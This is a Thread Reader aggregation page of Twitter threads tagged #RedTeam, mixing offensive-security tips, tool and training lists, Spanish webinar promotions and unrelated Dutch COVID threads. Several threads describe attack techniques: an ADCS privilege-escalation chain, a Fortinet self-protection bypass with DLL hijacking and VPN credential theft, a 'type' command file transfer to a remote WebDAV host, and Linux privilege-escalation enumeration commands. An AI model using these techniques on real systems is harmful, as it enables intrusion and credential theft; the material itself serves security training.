Discover and read the best of Twitter Threads about #RedTeam

Most recents (24)

Did you know that it is possible to elevate privileges with SeImpersonate in an ADCS environment? It is an alternative to *Potato that you can use in your Red Team operations. And you can do it all with Kraken! #redteam #webshell

You can read about this technique explained in… twitter.com/i/web/status/1… Image
First, you must obtain a delegation TGT, you can do it with Rubeus (previous image).

Then you convert the Ticket in KIRBI format to CCACHE. You can use ticketConverter from Impacket: Image
With the imported Ticket, you can request a certificate for the machine account using the "Machine" template. Then, you can use PKINIT authentication to get the NT Hash of the machine account. Use Certipy and keep it simple! Image
Read 4 tweets
#redteam tip: @Fortinet self protection bypass
Fortinet is using minifilter to prevent copying or deleting files in the app's installed location.
If you Reverse engineer the responsible driver, You will notice that there are some exceptions ImageImageImage
and some processes are able to copy/delete files in that location.
But the problem is that "it is only checking the end of the process image name and not the full path".

Since many fortinet exe files has dll hijack vulnerability and runs as a service, using this vulnerability
you can run your code as NT AUTHORITY/SYSTEM or all the users who logs in to the system.
And also it can be used as a persistent method.

Or even by hooking some functions, you will be able to get the server, username and password of the VPN that the user connects to.
Read 4 tweets
𝐌𝐚𝐥𝐰𝐚𝐫𝐞 𝐚𝐧𝐝 𝐑𝐞𝐯𝐞𝐫𝐬𝐞 𝐄𝐧𝐠𝐢𝐧𝐞𝐞𝐫𝐢𝐧𝐠 𝐂𝐨𝐧𝐭𝐞𝐧𝐭𝐬 📢

#infosec #Hacking #redteam
#malware #ReverseEngineering
#RE

Awesome Malware and Reverse Engineering
lnkd.in/dZFy_k6d

lnkd.in/dZh9hbpq
Malware API
malapi.io

lnkd.in/djqeN7RS

Malware Analysis and Reverse Engineering
lnkd.in/dXjFkZ7a

Retoolkit
lnkd.in/dwn8bRi3

Malware Bazar
bazaar.abuse.ch

Malware Analysis Journey
lnkd.in/d9B6UGQ8
Read 6 tweets
Grow your cybersecurity skills with this incredible collection of FREE learning resources.

⚡️ Get ready to level up!

Follow & share the 🧵

#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
1️⃣ Hands-on cyber security training through real-world scenarios.

tryhackme.com
2️⃣ LiveOverflow YouTube channel

youtube.com/@LiveOverflow
Read 11 tweets
Looking to kickstart your career in cybersecurity?

You can do it all with FREE resources and a clear step-by-step path

Here is How 🧵

#infosec #cybersecurity #pentesting #oscp @tryhackme #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Linux
1️⃣ Level - Introduction to OpenVPN

🅰️ OpenVPN: How to Connect

-OpenVPN - Windows
-OpenVPN - Linux
-OpenVPN - MacOS

The room is free complete it.👇

tryhackme.com/room/openvpn
2️⃣ Introductory Research Walkthrough

Here you will learn

- How to research
- How to search for vulnerabilities

The room is free complete it.👇

tryhackme.com/room/introtore…
Read 11 tweets
Red Team toolkit : 📢

#infosec #redteam #Hacking

RECONNAISSANCE:

- RustScan ==> lnkd.in/ebvRfBNy

- Amass ==> lnkd.in/e7V569N5

- CloudEnum ==> lnkd.in/ePHDeGZv

- Recon-NG ==> lnkd.in/edwaXFjS

- AttackSurfaceMapper ==> lnkd.in/ebbcj6Rm
INITIAL ACCESS:

- SprayingToolKit ==> lnkd.in/eBSAPz5z

- o365Recon ==> lnkd.in/eJwCx-Ga

- GadgetToJScript ==> lnkd.in/egPQBBXJ

- ThreatCheck ==> lnkd.in/eHvSPakR

- Freeze ==> lnkd.in/eNUh3zCi
DELIVERY:

- o365AttackToolKit ==> lnkd.in/etCCYi8y

- EvilGinx2 ==> lnkd.in/eRDPvwUg

- GoPhish ==> lnkd.in/ea26dfNg

- PwnAuth ==> lnkd.in/eqecM7de

- Modlishka ==> lnkd.in/eds-dR5C
Read 10 tweets
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
To host a simple python WebDAV server use wsgidav.
wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
github.com/mar10/wsgidav
If anyone knows how to have a webserver interpret the PROPFIND method as a GET method, I would be very interested in learning.
Read 4 tweets
Let's learn Red Teaming together
[Thread]🧵👇
Read 11 tweets
Red Team Resources 🖥

• Red Team Management by Joas
github.com/CyberSecurityU…

• Awesome Red Team by yeyintminthuhtut
github.com/yeyintminthuht…

• Awesome Red Team Operations by Joas
github.com/CyberSecurityU…

#cybersecurity #infosec #hacking #redteam
• Awesome Adversary Simulation Toolkit by 0x1
0x1.gitlab.io/pentesting/Red…

• Red/Purple Team by s0cm0nkey
s0cm0nkey.gitbook.io/s0cm0nkeys-sec…

• SpecterOps Red Team Blog
posts.specterops.io/tagged/red-tea…

• iRed Team Blog
ired.team/?trk=public_po…
• Red Team Tips Blog by Jean Maes
redteamer.tips

• Red Team Blog by Zach Stein
synzack.github.io

• Unstrustaland by João Paulo
untrustaland.com

• 100Security by Marcos Henrique
100security.com.br

• Red Team Village
redteamvillage.io
Read 4 tweets
Here's a list of free #PenetrationTesting and #RedTeam Labs you may set up in your own home to enhance your #hacking abilities :
1) Red Team Attack Lab
A simulated setting where red teams can practice exploiting #vulnerabilities in various operating systems.
lnkd.in/ernefQv8
2) Capsulecorp Pentest
#Capsulecorp is a lightweight virtual infrastructure operated using Vagrant and Ansible. One #Linux attacking system running #Xubuntu is included, along with four #Windows 2019 servers hosting a variety of #exploitable services.

lnkd.in/eYfGmNBe
Read 10 tweets
Dank zij @Rob_Roos is nu eindelijk voor iedereen (behalve @MarionKoopmans, @MarcBonten en nog zowat van die vaxdrammers) duidelijk wat voor ons 'wappies' al veel langer duidelijk was: vaccinatie had en heeft geen effect op transmissie. Een serieus draadje:
Het #coronatoegangsbewijs of #CTB of #QRcode was (en is) dus (altijd) gebaseerd (geweest) op een onwetenschappelijke aanname at best en een leugen at worst. Niettemin zijn op basis daarvan (a) miljoenen mensen maandenlang uitgesloten van grote delen van het sociale leven en ...
(b) werd op veel mensen ongeoorloofde druk uitgeoefend om zich toch maar te laten vaccineren, bijvoorbeeld om vakantie te kunnen of - in andere landen - om hun baan niet te verliezen of überhaupt boodschappen te kunnen doen. Oostenrijk had zelfs een vaccinatieplicht ingesteld.
Read 13 tweets
El Webinar Gratuito: "Explotación con Kali Linux" está disponible en video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20…
Muchas Gracias @GogodinezGo por el retweet.
Gracias @RDSWEB por el retweet.
Read 7 tweets
#Webinar Gratuito: "Análisis Forense a Apache". Jueves 2 de Junio del 2022. De 5:00pm a 5:45pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics Registro Libre en: reydes.com/d/?q=eventos
Muchas Gracias @Pumajosel por el retweet al Webinar Gratuito: "Análisis Forense a Apache". Jueves 2 de Junio del 2022.
Gracias @raumunz por el retweet al Webinar Gratuito: "Análisis Forense a Apache". Jueves 2 de Junio del 2022.
Read 11 tweets
El Webinar Gratuito: "Forense Digital a Sistemas Windows" está disponible en video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20…
Muchas Gracias @SilenusHack por el retweet.
Gracias @ciberconsejo por el retweet.
Read 11 tweets
Único #Curso Virtual Forense de Redes del año 2022. Domingos 5, 12, 19 y 26 de Junio. De 9:00 am a 12:00 pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics Más información en: reydes.com/d/?q=Curso_For…
Muchas Gracias @JCarlosLV2014 por el retweet al Único Curso Virtual Forense de Redes del año 2022
Gracias @RDSWEB por el retweet al Único Curso Virtual Forense de Redes del año 2022
Read 12 tweets
Finalizamos la cuarta y última sesión del Único Curso Virtual de OSINT - Open Source Intelligence del año 2022. #hacking #cybersecurity #redteam #osint #forensics reydes.com/d/?q=Curso_de_… ¡Muchas Gracias a todos los participantes! Image
Muchas gracias @Infogon por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Gracias @pyth4gorean por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Read 11 tweets
Iniciamos la cuarta y última sesión del Único Curso Virtual de OSINT - Open Source Intelligence del año 2022. #hacking #cybersecurity #redteam #osint #forensics reydes.com/d/?q=Curso_de_… Image
Muchas Gracias @MarcosJLpezL1 por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Gracias @AFroufe por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Read 11 tweets
Único Curso Virtual Forense de Redes del año 2022. Domingos 5, 12, 19 y 26 de Junio. De 9:00 am a 12:00 pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics Más información en: reydes.com/d/?q=Curso_For…
Muchas gracias @MiguelJimenezMK por el retweet al Único Curso Virtual Forense de Redes del año 2022.
Gracias @carlaSaab777 por el retweet al Único Curso Virtual Forense de Redes del año 2022.
Read 7 tweets
El Webinar Gratuito: "Vulnerabilidades en CMS Web" está disponible en video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20… Image
Muchas gracias @Infogon por el retweet.
Gracias @JCarlosLV2014 por el retweet.
Read 6 tweets
#SaveTheDate ! Le CReC @SaintCyrCoet organise le 14/06 une journée d’étude sur « Guerre et Fiction. Les effets de la fiction sur la conduite de la guerre ». @Inflexions10, @IRSEM1, @defense_ouest, @e_rioux, @mbourlet, @PhChapleau, @jean__michelin👇
Il s’agira notamment, avec la #RedTeam, @staillat, @ABRGLL, en présence de @JulienNocetti, @DidierDanet, @SandraCureau et de quelques autres, de renverser les perspectives :
Non pas la manière dont, de façon très attendue, la guerre inspire la fiction, mais comment les diverses formes de fiction influent sur la manière dont on fait (ou prépare) la guerre.
Read 5 tweets
== Trademark and Copyright Recon ==

How to find assets no other bug hunters have found.

One of my simple "secrets" for years.

Little automation exists for it.

💸💸💸

a thread🧵

🚨follow, retweet, & like for more hacker tips!🚨

1/x
When approaching a bounty, the scope is important. Not only the domain list but, all the text.

There are about ~30 paid bounty programs across the major platforms that are explicitly open scope or have the wording right under the scope section that says something like...

2/x
"If you find anything else that you believe to belong to XYZ company, report it and we will assess its validity. It may not result in a bounty"

But.. To be honest, criticals usually DO get paid.

3/x
Read 6 tweets
The Linux Privilege Escalation Cheatsheet... :)

Credits ~ @g0tmi1k

👇🏻🧵

#cybersecurity #infosec #linux #hacking #redteam
Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a
Read 21 tweets
Deze hele draad, inclusief de reacties, geeft de onmacht aan van de manier waarop wij in NL de coronacrisis hebben aangepakt. Ook ik las het artikel waar @Gert_van_Dijk op aansloeg. 'Corona trof migranten en mensen met lage inkomens het hardst'. Nieuws dat geen nieuws was >
dit wisten we tenslotte al lang. Hier waarschuwden we steeds voor en hier probeerden we steeds zo goed mogelijk actie op te ondernemen, ook bij de GGD'en. De woede die @Ammer_B voelt, die voel ik ook. De onmacht. Je doet zo verschrikkelijk hard je best om het tij te keren, om >
je bijdrage te leveren. Dag en nacht hiermee bezig zijn. Niet omdat het je 'verdienmodel' is, maar omdat je het niet aan kunt zien dat steeds weer dezelfde groepen mensen de hardste klappen krijgen. En in dit geval waren de klappen héél erg hard. Als GGD-er zat ik al vrij snel >
Read 17 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!